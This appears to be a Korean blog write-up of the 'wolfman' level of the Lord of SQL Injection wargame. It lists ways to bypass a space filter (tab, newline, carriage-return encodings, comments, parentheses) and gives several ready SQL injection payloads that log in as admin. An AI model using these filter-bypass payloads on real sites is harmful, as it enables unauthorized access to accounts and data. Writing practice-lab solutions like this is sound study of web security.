-
[Lord of SQL_injection] #5 wolfman$ 웹 해킹 $/los.rubiya.kr 2019. 4. 5. 19:06
wolfman 문제의 소스코드입니다.
띄어쓰기를 하지 않아야하고 필터링을 우회해야하면서도 id가 admin이여야 해결되는 문제입니다.
띄어쓰기를 우회하는 방법은 많습니다.
-
Tab : %09
-
Line Feed (\n) : %0a
-
Carrage Return (\r) : %0d
-
주석 : /**/
-
괄호 : ()
저는 \n 인 %0a를 이용해서 문제를 해결해 보겠습니다.
?pw='or%0aid='admin
-
?pw='or%09id='admin
-
?pw='or%0aid='admin
-
?pw='or%0did='admin
-
?pw='or/**/id='admin
-
?pw='or(id='admin')%23
'$ 웹 해킹 $ > los.rubiya.kr' 카테고리의 다른 글
[Lord of SQL_injection] #7 orge (0) 2019.04.05 [Lord of SQL_injection] #6 darkelf (0) 2019.04.05 [Lord of SQL_injection] #4 orc (0) 2019.04.05 [Lord of SQL_injection] #3 goblin (0) 2019.02.10 [Lord of SQL_injection] #2 cobolt (0) 2019.02.10 -